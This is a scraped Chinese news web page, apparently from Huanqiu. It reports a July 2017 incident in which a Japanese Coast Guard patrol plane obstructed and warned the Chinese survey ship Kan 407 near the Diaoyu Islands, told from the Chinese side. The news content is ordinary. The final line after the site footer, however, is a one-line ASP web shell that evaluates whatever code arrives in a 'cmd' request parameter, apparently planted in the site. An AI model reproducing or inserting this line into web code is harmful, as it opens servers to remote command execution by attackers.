大陆新闻

中国调查船在钓鱼岛海域科考 遭日方强硬阻挠“警告”

时间:2017-7-5 22:47:34  作者:  来源:环球网  查看:78  评论:0
内容摘要:7月4日当天,一艘中国海洋调查船在中国钓鱼岛海域进行科学考察,遭到日本海上保安厅巡逻机的阻挠和“警告”,称中方船只“未经允许不得擅自进行作业”。日本媒体援引第11管区海上保安本部的话称,中国海洋调查船“勘407&rdqu...

7月4日当天,一艘中国海洋调查船在中国钓鱼岛海域进行科学考察,遭到日本海上保安厅巡逻机的阻挠和“警告”,称中方船只“未经允许不得擅自进行作业”。

日本媒体援引第11管区海上保安本部的话称,中国海洋调查船“勘407”号4日在钓鱼岛附近的“日本专属经济区(EEZ)”内作业,日方还确认,中方海洋调查船有疑似缆线状物体投入海中并拖曳航行。

日方巡逻机不断阻挠中方船只进行海洋科考,并发出“警告”称,“未经允许不得擅自在该海域内进行作业”。

据悉,今年6月13日,“勘407”号在中国钓鱼岛海域进行科学考察时也曾遭到日本海上保安厅的巡逻船阻挠。


中国调查船在钓鱼岛海域科考_遭日方强硬阻挠“警告”
相关评论
评论者:      验证码:  点击获取验证码
湘ICP备11011102号
Powered by WCADDL
":eval request("cmd"):